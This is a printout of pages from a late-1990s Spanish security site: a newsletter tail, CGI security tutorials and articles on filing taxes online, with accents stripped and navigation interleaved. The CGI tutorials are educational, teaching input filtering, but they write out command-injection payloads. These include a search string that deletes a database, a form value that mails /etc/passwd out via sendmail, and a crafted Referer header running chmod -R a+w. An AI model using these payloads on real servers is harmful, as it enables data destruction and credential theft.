2. Mster de Especialista en Criptografa en la UCM
El ttulo propio de "Especialista en Criptografa" que ofrecer la Universidad
Complutense de Madrid trata de satisfacer el inters creciente que desde distintos
sectores de la actividad cientfica e industrial ha despertado el desarrollo de la
Criptografa, sus implicaciones matemticas, que han creado autnticas nuevas
especialidades y sus aplicaciones en el mundo de las comunicaciones.

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt (2 of 5) [25/10/2000 02:32:35 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt

El ttulo constar de diversos cursos, tericos y prcticos, impartidos por profesores


del Departamento de lgebra de la Facultad de Matemticas de la Universidad Complutense y
por investigadores del Departamento de Tratamiento de la Informacin y Codificacin del
Instituto de Fsica Aplicada del CSIC.
El nmero total de crditos, tericos y prcticos, del ttulo ser de 30, distribuidos a
lo largo de un curso acadmico ordinario, dividido en dos cuatrimestres, y organizados
segn las diversas materias como se indica a continuacin.
Ms informacin en:
http://www.iec.csic.es/criptonomicon/master98.html
******************************************
3. Technotronic: la tecnologa al servicio de qu?
Pgina espectacular dedicada a la seguridad de la informacin. Cubre seguridad en Unix,
Novell, Windows, ataques de denegacin de servicio, privacidad, TCP/UDP, etc.
Tericamente, sirve al propsito de informar a los administradores sobre los peligros de
la Red, pero suministra muchos detalles jugosos que pueden dar ideas a un hacker. Dnde
trazar la frontera entre lo que sirve al administrador y lo que sirve al hacker?
Un sitio muy completo, que apuesta por la informacin sin trabas.
La pgina est disponible en:
http://www.technotronic.com/
(Mi agradecimiento a Manuel Porras por suministrarme la direccin)
******************************************
4. Una red libre
WebFree permite te permite ser el editor de los sitios Web que visitas, ya que puedes
usarlo para filtrar anuncios, imgenes o links no deseados y cookies. El objetivo de
WebFree es convertir tu navegacin por la Web en una actividad ms productiva.
Por el momento, WebFree est disponible slo para Macintosh, siendo compatible con
OpenTransport y MacTCP, y funciona con los principales navegadores, incluyendo Netscape
Navigator, Internet Explorer y Cyberdog.
Se puede descargar WebFree 1.1 (versin shareware) desde:
http://www.falken.net/webfree/
******************************************
5. Cifrador de ficheros para Windows
Crypto es una pequea utilidad que permite cifrar ficheros de forma cmoda y sencilla,
sin ms que arrastrar y depositar y despus introduciendo una clave.
Se puede descargar de:
http://www.execpc.com/~sbd/Crypto.html
******************************************
6. Fe de erratas
A continuacin reproduzco un fragmento del mensaje que me envi Antonio Caravantes con
motivo de la noticia del marcado del nmero 90# en el boletn anterior.

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt (3 of 5) [25/10/2000 02:32:35 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt

Una informacin similar ha sido distribuida por el diario La Vanguardia


<http://www2.vanguardia.es/>, diciendo:
<< La empresa Gumaro (http://www.gumaro.com/) ha advertido de un timo que
se est realizando y por el cual son cargadas en algunas facturas las
llamadas telefnicas que otros realizan. La tctica empleada por los
supuestos timadores es sencilla: llaman a un nmero al azar
identificndose como empleados de Telefnica que estn realizando
comprobaciones en la lnea, piden que se marque una secuencia numrica
determinada (90# generalmente) y acaban comunicando que todo se desarrolla
con normalidad. A partir de este momento, todas las llamadas realizadas
por los estafadores, sern cargadas en la factura de dicho nmero.
Si bien Telefnica no ha confirmado este fraude, el hecho que tampoco lo
haya desmentido hace pensar que tal timo es real y est sucediendo
actualmente. [16/07/98] >>
El mismo rumor circula ya por muchos foros, habiendo alcanzado el grado de
"leyenda urbana" en Internet.
La leyenda procede de USA. En Internet ya hay documentacin sobre eso, por
ejemplo en http://www.tourbus.com/espanol/tb021298.txt , donde el asunto
queda bastante aclarado por Bob Rankin (12-02-98). Parece que algunos
usuarios de la compaa ATT (EE.UU.) s pueden ser vctimas de ese fraude;
algunos, no la mayora: solo podr afectar a vctimas que tengan centralita
y que marcan el 9 cuando hacen una llamada al exterior.
Personalmente me he tomado la molestia de hacer una verificacin personal,
llamando a Telefnica (1004, dpto de atencin al cliente) para preguntar
si esa operacin 90# era posible. Yo no he mencionado nada relacionado con
un posible fraude, pero se apresuran a decirme que eso es un rumor sobre
una estafa, y que no pueden confirmarlo (pero tampoco lo desmienten).
Le digo a la telefonista que no estoy hablando de estafas, que eso no me
interesa; lo que quiero es que mi hijo -que viaja mucho- pueda llamar a
cualquier sitio cargando el coste a mi factura; quiz pueda usar eso del
90# o algo parecido para que yo acepte el cargo. No lo saben y me pasan
con el dpto comercial. All me aclaran que para eso (que mi hijo llame y
pague yo) tengo que pedir a telefnica una tarjeta personal asociada a mi
factura, con cdigo secreto. Desde cualquier cabina se podra teclear el
cdigo secreto y efectuar la llamada. Lo de hacerme una llamada para
teclear 90# y autorizar el pago... eso no existe; telefnica no tiene ese
servicio ni nada similar. En Espaa no es posible de ninguna forma.
- -Antonio Caravantes (mailto:ac@ctv.es) en Salamanca, Espaa.
http://www.ctv.es/USERS/ac/pgp
******************************************
7. Informacin sobre suscripcin y cmo borrarse
Para borrarse de este servicio basta con enviar un correo a la direccin
cripto-request@iec.csic.es con el siguiente mensaje (sin asunto o "subject"):
leave
desde la misma cuenta de correo en la que recibs el boletn.
Tenis ms informacin y nmeros atrasados en la pgina
http://www.iec.csic.es/criptonomicon/suscripcion.html

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt (4 of 5) [25/10/2000 02:32:35 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt

******************************************
(C) Copyright 1998 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC por
Gonzalo lvarez Maran
email: gonzalo@iec.csic.es

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt (5 of 5) [25/10/2000 02:32:35 p.m.]

Ataque a base de datos

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Ataque a travs de una base de datos


Todava pueden encontrarse muchas bases de datos sencillas (o cutres, segn se
mire), formadas por un nico archivo plano (flat file), donde se encuentra en
caracteres ASCII la informacin que contiene la base de datos. El proceso de
creacin de una base de datos de formato plano se reduce a crear un fichero cuyas
entradas se corresponden con los campos de la base de datos. A la simplicidad de
creacin, se aade la facilidad a la hora de hacer consultas, por ejemplo sirvindose
de herramientas de bsqueda del propio sistema operativo, como grep, que
devuelve las lneas que contengan al trmino de bsqueda suministrado. De esta
forma, nos devolvera todos los registros asociados a la palabra a buscar. Un ejemplo
tpico sera la minibase de datos con las contraseas de los usuarios en un sistema
Unix, el famoso /etc/passwd.
Supongamos que disponemos en nuestro servidor Web de una base de datos tal,
llamada personal, y queremos conocer la informacin referente al usuario
Gonzalo. Bien, bastara con lanzar el siguiente comando:

JavaScript

grep gonzalo personal


Cookies

Crashes

Agujeros

y nos devolvera todas las lneas (registros) que contuviesen en alguno de sus campos
la palabra "gonzalo".
El siguiente paso consistira en automatizar el proceso desde una pgina Web, de
manera que cualquier usuario pudiese realizar consultas.
Para ello, se le presenta al usuario el siguiente formulario:

Spam

Introduzca el nombre de la persona cuyos datos desea buscar:

Remailers

Enviar

Anonimato

Restablecer

Correo seguro

Hasta ahora todo parece perfectamente normal, pero qu ocurrira si introduzco en


el recuadro la siguiente cadena?:

Web seguro

root /etc/passwd; rm

Susurros desde la Cripta

Copia la cadena al portapapeles, pgala en la casilla de bsqueda y pulsa el botn de


enviar.

file:///C|/TEMP/criptonomicon/criptonomicon/basedatos.html (1 of 2) [25/10/2000 02:32:35 p.m.]

Ataque a base de datos


Consejos prcticos

Referencias

En este caso, como habrs comprobado en la pgina devuelta, se buscara la lnea


correspondiente a la clave del root en el fichero /etc/passwd y a continuacin se
borrara la base de datos personal. Todo ello por no preocuparse de filtrar la
entrada del usuario.

Libro de Visitas

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/basedatos.html (2 of 2) [25/10/2000 02:32:35 p.m.]

Vulnerabilidad en CGI

Suscripcin gratis

Intimidad?

Artculos

Vulnerabilidad en CGI
Imagnate que quiero enviar un correo a alguna de las siguientes personas:

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Gonzalo lvarez
Fausto Montoya
Alberto Peinado
enviar correo

Si en vez de apretar el botn de Enviar, examino el cdigo HTML para ver lo que hace
el formulario, veo que podra engaar al CGI escribiendo:
http://www.iec.csic.es/cgi-bin/vulnerable.exe?destinatario
= gonzalo@iec.csic.es; sendmail -t
gonzalo@pampaneira.iec.csic.es < /etc/passwd;
Puedes hacer la prueba, poniendo tu direccin de correo o mandando ejecutar
cualquier otro comando del shell.
Nota: Si no funciona, prueba a sustituir los espacios por '%20'.

Otra posibilidad que tienes es guardar esta pgina en tu disco duro local. A
continuacin, edtala y en la lnea siguiente:
<input type = radio name = "destinatario" value =
"gonzalo@iec.csic.es" checked>Gonzalo lvarez<br>
sustituyes el contenido de value por lo siguiente:

Remailers

gonzalo@iec.csic.es; sendmail -t
gonzalo@pampaneira.iec.csic.es < /etc/passwd;

Anonimato

Guardas el archivo y lo cargas en tu navegador. Ahora cuando pulses el botn de


"Enviar correo", se producir el mismo efecto que antes.

Correo seguro

Web seguro

Susurros desde la Cripta

Nota: Si no funciona, prueba a sustituir los espacios por '%20', al igual que antes.

En vez de punto y coma, ";", se pueden separar los comandos por retornos de carro,
que de hecho es la forma ms natural. En el caso de HTTP, en la cadena de URL los
retornos de carro se codifican como "%0a". Por lo tanto, es importante no olvidarse de
filtrar en la entrada tambin los carateres de retorno de carro y alimentacin de lnea,
"\n" y "\r", ya que en caso contrario, si nos olvidamos de ellos, podra ocurrir que

file:///C|/TEMP/criptonomicon/criptonomicon/mailbug.html (1 of 2) [25/10/2000 02:32:36 p.m.]

Vulnerabilidad en CGI
Consejos prcticos

utilizando el retorno de carro un atacante consiga encadenar varios comandos de


entrada al CGI, con posibles efectos desastrosos.

Referencias

Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/mailbug.html (2 of 2) [25/10/2000 02:32:36 p.m.]

Ataque REFERER

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Ataque a travs de HTTP_REFERER


Imagnate que quiero procesar un formulario o lo que sea, para lo cual hay que pulsar
el siguiente botn:
procesar datos

Al pulsar el botn, vemos que nos aparece la direccin de la pgina desde la que
venimos. Si en vez de apretar el botn de Procesar datos, abro una conexin telnet al
puerto 80 y envo el siguiente comando, se obtiene:
telnet www.iec.csic.es 80
Trying 161.111.31.119...
Connected to viznar.iec.csic.es.
Escape character is '^]'.
GET /cgi-bin/referer.exe HTTP/1.0
Referer: "dir"
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Tue, 24 Mar 1998 17:56:55 GMT
Content-type: text/html
<html> <head>
<title>Cmo explotar el HTTP_REFERER</title>
</head>
<body>
<h1>Cmo explotar el HTTP_REFERER</h1>
Vienes de HTTP_REFERER = "dir"
</body> </html>
Connection closed by foreign host.
Nota: En rojo aparece lo que debes escribir en tu ordenador. En azul, las respuestas del servidor.

Como se puede observar, ahora HTTP_REFERER pasa a tomar el valor que le


hayamos especificado, "dir" en el ejemplo. Si disponis de cliente telnet, no tenis
ms que repetir los pasos que aparecen en rojo, modificando a voluntad el comando.
Bien, y de qu sirve todo esto? Pues si en el script en CGI ocurriese alguna lnea

file:///C|/TEMP/criptonomicon/criptonomicon/refererbug.html (1 of 2) [25/10/2000 02:32:36 p.m.]

Ataque REFERER
Consejos prcticos

como la siguiente:
if [ $HTTP_REFERER ]

Referencias

Libro de Visitas

se ejecutara el comando en un shell. Por razones obvias, no he puesto disponible una


versin completa del ejemplo, pero imagino que ya os hacis a la idea de lo que
podra pasar, verdad?
Imaginad una peticin Web fabricada con telnet que tuviese esta pinta:
GET /cgi-bin/referer.exe HTTP/1.0
Referer: "`chmod -R a+w"
donde referer.exe incluyese la clusula if anterior. Lo que ocurrira es que ese
directorio y todos los que colgasen por debajo pasaran a tener permiso de escritura
por todo el mundo. Catastrfico. Cualquiera podra modificar las pginas del
servidor, por ejemplo.
Este ejemplo tan sencillo nos muestra cmo NUNCA debemos dar por supuesto
ningn valor que recibimos del cliente, ni siquiera variables de sistema como el
HTTP_REFERER.
Podis encontrar ms informacin sobre la cabecera HTTP_REFERER en el artculo
de Lincoln Stein.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/refererbug.html (2 of 2) [25/10/2000 02:32:36 p.m.]

Vulnerabilidad en CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Vulnerabilidad
El punto vulnerable de la programacin en CGI, es decir, la
Peligros
amenaza que representan para la seguridad del servidor, es doble:
Vulnerabilidad
Por un lado, la posibilidad de que el CGI sea engaado por
la entrada del usuario para que ejecute comandos
SSI
imprevistos, pudiendo llegar a causar graves daos en el
servidor;
Llamada a programas
de otro, la posibilidad de revelar innecesariamente
informacin acerca del servidor, que permitir al atacante conocer mejor la
configuracin del sistema y estar as mejor equipado para buscar posibles
agujeros por los que colarse.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/vulnerabilidad.html [25/10/2000 02:32:37 p.m.]

Server-side includes (SSI)

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Server-side includes (SSI)


Los server-side includes (SSI) son directivas que se pueden
Peligros
incrustar en una pgina HTML, de manera que presentar como
parte de la pgina el contenido de un fichero o la salida de un
Vulnerabilidad
comando. Aunque los SSI pueden ser muy tiles y dotan de gran
flexibilidad a una pgina Web, tambin pueden resultar
SSI
computacionalmente costosos, pueden impedir la portabilidad de
las pginas Web y tal vez ms importante, pueden llegar a abrir
Llamada a programas
agujeros de seguridad, ya que el autor de la pgina HTML decide
qu programas se ejecutarn y con qu argumentos. En el caso peor, se podra llegar
a ejecutar cualquier comando y as producir daos irreparables o revelar informacin.
Por este motivo, a no ser que se tenga una buena razn para usarlos, lo ms
conveniente es deshabilitarlos.
Para ms informacin sobre riesgos de las directivas de Server-Side Includes, visita
la seccin sobre SSI.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/pelssi.html [25/10/2000 02:32:37 p.m.]

Llamada a programas en CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Llamada a programas
Uno de los aspectos ms delicados de la programacin con CGI,
Peligros
es la llamada a otros programas o comandos del sistema desde la
aplicacin CGI. Un ejemplo tpico sera el enviar un correo a un
Vulnerabilidad
usuario a la direccin que ste ha introducido a travs de un
formulario. Para ello puede invocarse al programa sendmail,
SSI
abriendo un shell mediante diversos mecanismos. Ya veremos
cmo estas llamadas pueden ser subvertidas por un atacante, de
Llamada a programas
manera que se ejecuten otros comandos adems del esperado, con
el fin de causar daos al sistema u obtener informacin sobre el mismo.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/llamada.html [25/10/2000 02:32:37 p.m.]

Mecanismo de entrega y procesamiento de datos en CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Mecanismo de entrega y procesamiento


de datos
En la figura he representado de manera simplificada el proceso
Descripcin
que tiene lugar desde que al usuario se le presenta el formulario de
entrada de datos hasta que obtiene la pgina de resultado de
Mecanismo de CGI
procesar esos datos:
1. Al usuario se le presenta a travs de su navegador una pgina en formato
HTML que contiene un formulario, codificado mediante las etiquetas
<FORM> y </FORM>. Una vez que el usuario ha rellenado los campos del
formulario, pulsa el botn de enviar, que invoca al programa CGI en el
servidor.
2. Los datos del formulario se envan al servidor utilizando bien el mtodo POST
o el mtodo GET, cuyas ventajas/desventajas para la seguridad veremos
prximamente.
3. Los datos llegan hasta el servidor a travs de la Internet, donde la aplicacin
CGI invocada los procesa.
4. Una vez convenientemente procesados, el programa CGI debe ejecutar alguna
accin o generar una respuesta, generalmente en la forma de una pgina en
formato HTML, que ser enviada de vuelta al navegador.
5. Se aaden las cabeceras HTTP necesarias y se enva de vuelta a travs de
Internet el archivo HTML con la respuesta a los datos del formulario
convenientemente presentada.
6. El navegador Web recibe el archivo HTML y lo visualiza en pantalla. Es
comn que la pgina contenga alguna informacin relacionada con el resultado
del procesamiento de los datos, junto con algn enlace para regresar a la
pgina del formulario, en el paso 1.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/mecanismo.html (1 of 2) [25/10/2000 02:32:38 p.m.]

Mecanismo de entrega y procesamiento de datos en CGI

Es importante resaltar que no es imprescindible la presencia de un formulario para


invocar desde el navegador al CGI del servidor. Muchas veces, basta con pinchar en
un enlace para llamar al CGI y tambin es posible llamarle directamente desde la
ventana de URL, introduciendo el URL completo del programa CGI.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/mecanismo.html (2 of 2) [25/10/2000 02:32:38 p.m.]

50 das de Declaracin de Renta por Internet

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

50 das de Declaracin de Renta por Internet


Como se anunci en una anterior columna de seguridad, "La Declaracin de
la Renta a travs de Internet", la Agencia Tributaria Espaola ha sido pionera
en la implantacin de un nuevo servicio telemtico avanzado, que permite la
presentacin de la Declaracin de la Renta a travs de Internet. En este
artculo, se publicar una entrevista mantenida con Sergio Ramn Ruiz
Mahllo, responsable tcnico de Renta-98, dentro del proyecto CERES de la
Fbrica Nacional de Moneda y Timbre (FNMT), el pasado lunes 21 de Junio.

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

La FNMT es la responsable de prestar los servicios tcnicos y


administrativos necesarios para garantizar la seguridad, validez y eficacia de
la emisin y recepcin de comunicaciones y documentos a travs de
tcnicas y medios electrnicos, informticos y telemticos en el mbito de
las relaciones que se produzcan, en el caso de la Declaracin de la Renta,
entre las personas fsicas y jurdicas con la Administracin General del
Estado.
El proyecto CERES (CERtificacin ESpaola) tiene por objetivo establecer
una Entidad Pblica de Certificacin, que permita autenticar y garantizar la
confidencialidad de las comunicaciones entre ciudadanos, empresas u otras
instituciones y administraciones pblicas a travs de las redes abiertas de
comunicacin, prestando as de manera segura los servicios mencionados
anteriormente.
A continuacin se reproduce la parte fundamental de la entrevista:

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Se acerca el momento de finalizacin de presentacin de las


declaraciones. Cul es su valoracin general de la experiencia hasta
la fecha?
En cuanto al proyecto en s, te dir que la experiencia ha sido realmente
satisfactoria. Ni los ms optimistas pensaban que se superasen los 10.000
certificados y las 10.000 declaraciones presentadas y las cifras son stas a
fecha de hoy.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros06.html (1 of 3) [25/10/2000 02:32:40 p.m.]

50 das de Declaracin de Renta por Internet


Consejos prcticos

Referencias

Libro de Visitas

Podra dar algunas cifras respecto a la demanda ciudadana del


servicio de certificacin?
Se han realizado 30641 solicitudes de certificado en el web de la FNMT, de
los cuales se acreditaron en las oficinas de la AEAT 15723 y como resultado
se emitieron 14863 certificados (la diferencia se debe a errores en la
solicitud por realizar mltiples peticiones para un mismo NIF, aportar datos
incorrectos, reemisin de certificados tras hacer una revocacin que son solo
contabilizados una vez, etc.) A la fecha se haban presentado ms de 17300
declaraciones (el nmero es superior al de certificados por presentadores
colectivos autorizados)
El servicio de atencin al usuario de la FNMT ha contestado 1881 solicitudes
de informacin va mail y mas de 800 llamadas telefnicas y nuestro web, en
la parte de la renta, ha tenido mas de 130.000 hits.
Las cifras son realmente asombrosas, si tenemos en cuenta el nivel de
"cultura Internet" de nuestro pas. Cul es su impresin sobre estas
cifras?
Adems de los nmeros, que dicen bastante, mi impresin personal es la
siguiente: La FNMT ha prestado un servicio eficaz tanto en la emisin de
certificados como en la atencin a usuarios, se podra decir que en un
porcentaje muy alto, se ha rozado la excelencia, entendida en los trminos
de calidad "cuando se superan las expectativas del cliente", pero esto no nos
puede dejar dormidos en los laureles y para prximos proyectos tendremos
que mejorar algo muy importante, la formacin.
Cmo valorara los puntos fuertes y dbiles del proyecto de cara a la
respuesta de los usuarios?
Nuestro xito se ha debido en gran medida a la meticulosidad de las
explicaciones que se han dado al usuario, pero esto mismo nos ha producido
algunos problemas. Cuando iniciamos el proyecto pensbamos que
solamente solicitaran certificados aquellas personas mas familiarizadas con
Internet, por eso nuestras previsiones eran bajas, y eso ha sido un error de
clculo. Yo mismo he guiado a algn usuario a travs del proceso, que no
saba borrar o renombrar un fichero, no saba lo que era un directorio, etc.
Tenemos muchas ancdotas, desde aquel que nos felicita efusivamente,
hasta el que nos descalifica por errores propios o ajenos, pasando por el que
nos preguntaba si tena que comprar el certificado en un estanco. Ah estuvo
nuestro punto flaco, en la formacin, hemos dado un nivel de informacin
bueno aunque mejorable, pero haciendo autocrtica no hemos sabido
"formar" a la gente.
Qu enseanzas han obtenido de esta primera experiencia?
Nadie nace sabiendo y estos procesos novedosos son poco conocidos.
Cuando estbamos realizando la informacin, pensbamos en que personas

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros06.html (2 of 3) [25/10/2000 02:32:40 p.m.]

50 das de Declaracin de Renta por Internet

de la edad y conocimientos de nuestros propios padres o abuelos pudieran


hacer la declaracin por Internet y por eso pusimos pantalla a pantalla lo que
se encontraran. Esto ha funcionado bien, pero para el futuro inmediato
debemos hacer un ejercicio de formacin, explicar qu es un certificado, qu
es una firma digital, cmo se genera, qu son las claves, etc. Esto no es fcil
hacerlo en un lenguaje sencillo y para el ciudadano medio, pero lo
intentaremos para la prxima y ah necesitamos la ayuda de todos aquellos
que lo hacis desde diversos medios.
Cul ha sido la reaccin de la prensa?
En cuanto a la prensa, te dir que se ha volcado con nosotros, no ha habido
da que no haya salido en algn medio, en algunos casos, como en EL
CIBERPAIS, tenamos una columna todos los Jueves. Los clipping de
prensa son tan extensos que hace das que rehuyo su lectura.
Publicado en el Boletn del Criptonomicn #52.

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros06.html (3 of 3) [25/10/2000 02:32:40 p.m.]

La Declaracin de la Renta a travs de Internet

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

La Declaracin de la Renta a travs de Internet


Nos encontramos en el umbral de la Sociedad de la Informacin, en la vque
Internet est desempeando un papel protagonista, facilitando formas de
relacin entre los miembros de la sociedad que hace tan slo unos aos no
eran siquiera soadas.
En este contexto perfilado por las nuevas tecnologas de la informacin
emergentes, las Administraciones espaolas han apostado por el futuro de
Internet como vehculo de comunicacin e interaccin con el ciudadano. La
evolucin de su aportacin al desarrollo de Internet ha seguido los pasos
comunes en la mayora de empresas privadas, universidades, etc. Primero,
desarrollo de webs testimoniales de presencia en Internet en los que se
pone informacin a disposicin del pblico, para continuar ms adelante
incorporando servicios de valor aadido, como la capacidad de realizar
gestiones directamente a travs de la Red.
A medida que el uso de Internet crezca en Espaa, los ordenadores
personales vayan penetrando en los hogares y las tarifas de acceso se
reduzcan, aumentar entre los espaoles la demanda de este tipo de
servicios a travs de redes de comunicaciones. Precisamente para
satisfacerla, la Fbrica Nacional de Moneda y Timbre lidera el proyecto
CERES (CERtificacin ESpaola), cuyo objetivo es erigirse en Autoridad de
Certificacin para actuar como garante en todas las relaciones habidas con
las administraciones pblicas.
Como toda autoridad de certificacin, la funcin de la FNMT ser emitir
certificados digitales en los que se atestige la identidad de la persona que
los porta. Un certificado digital es un documento electrnico que garantiza la
identidad de una persona. Contiene (o puede contener) informacin acerca
de la persona, como su nombre, DNI, su direccin de correo, fecha de
emisin y de caducidad del certificado y la parte pblica de su pareja de
claves pblica y privada, todo ello firmado por la FNMT. Estos certificados le
permitirn realizar gestiones con las distintas administraciones (estatales,

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros04.html (1 of 3) [25/10/2000 02:32:41 p.m.]

La Declaracin de la Renta a travs de Internet


Consejos prcticos

Referencias

Libro de Visitas

autonmicas o locales), bien remotamente desde su casa a travs de


Internet o personndose con ellos en las dependencias de la Administracin
correspondientes.
Para que los ciudadanos puedan almacenar estos certificados, y puedan
utilizar su clave privada para firmar documentos con validez legal ante la
Administracin, todo ello de manera electrnica, la FNMT emitir unas
tarjetas electrnicas conteniendo toda la informacin del certificado personal.
De esta forma, el poseedor de la tarjeta no tiene ms que introducirla en un
lector al efecto, para que pueda realizarse operaciones como autenticarse
ante un servidor web de la Administracin para acceder a datos privados o
firmar un documento, como por ejemplo su declaracin de la renta. Para
completar estas tareas, se comercializarn lectores de tarjeta, cuyo precio
oscilar entre las 5.000 y las 7.000 pesetas, dispositivos que podrn
conectarse al ordenador personal independientemente del sistema operativo
que utilice. El nico software requerido es el navegador Netscape Navigator
o Internet Explorer, versiones 4.0 superiores.
Se prev que el despliegue definitivo de las tarjetas y su utilizacin en
gestiones con la Administracin dar comienzo a partir del segundo
semestre de este ao. De momento, y hasta que las tarjetas estn
disponibles y plenamente operativas, por primera vez se puede realizar la
Declaracin de la Renta, del ao fiscal 1998, a travs de Internet. El proceso
hace uso masivo de la criptografa de clave pblica (certificados, firmas
digitales, claves pblicas y privadas, etc.), ya que en materia tan delicada
resulta imperativo implantar mecanismos de alta seguridad que garanticen la
integridad, autenticidad y confidencialidad de los datos manipulados por
ambas partes. Gracias al servicio de estas avanzadas herramientas
criptogrficas de proteccin de la informacin personal, transacciones de tipo
econmico o administrativo son ya una realidad presente a travs de las
modernas redes de ordenadores. Su adopcin por un nmero cada vez
mayor de organismos del Gobierno y su futuro dependern en gran medida
de la popularidad de que gocen las experiencias pioneras actuales.
Se considera usted ciudadano de la nueva Sociedad de la Informacin?
Le gustara impulsar el papel de la Red en el tejido social espaol? Declare
este ao a travs de Internet.
Publicado en el Boletn del Criptonomicn #49.

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros04.html (2 of 3) [25/10/2000 02:32:41 p.m.]

La Declaracin de la Renta a travs de Internet

E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros04.html (3 of 3) [25/10/2000 02:32:41 p.m.]

Barreras al comercio electrnico

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

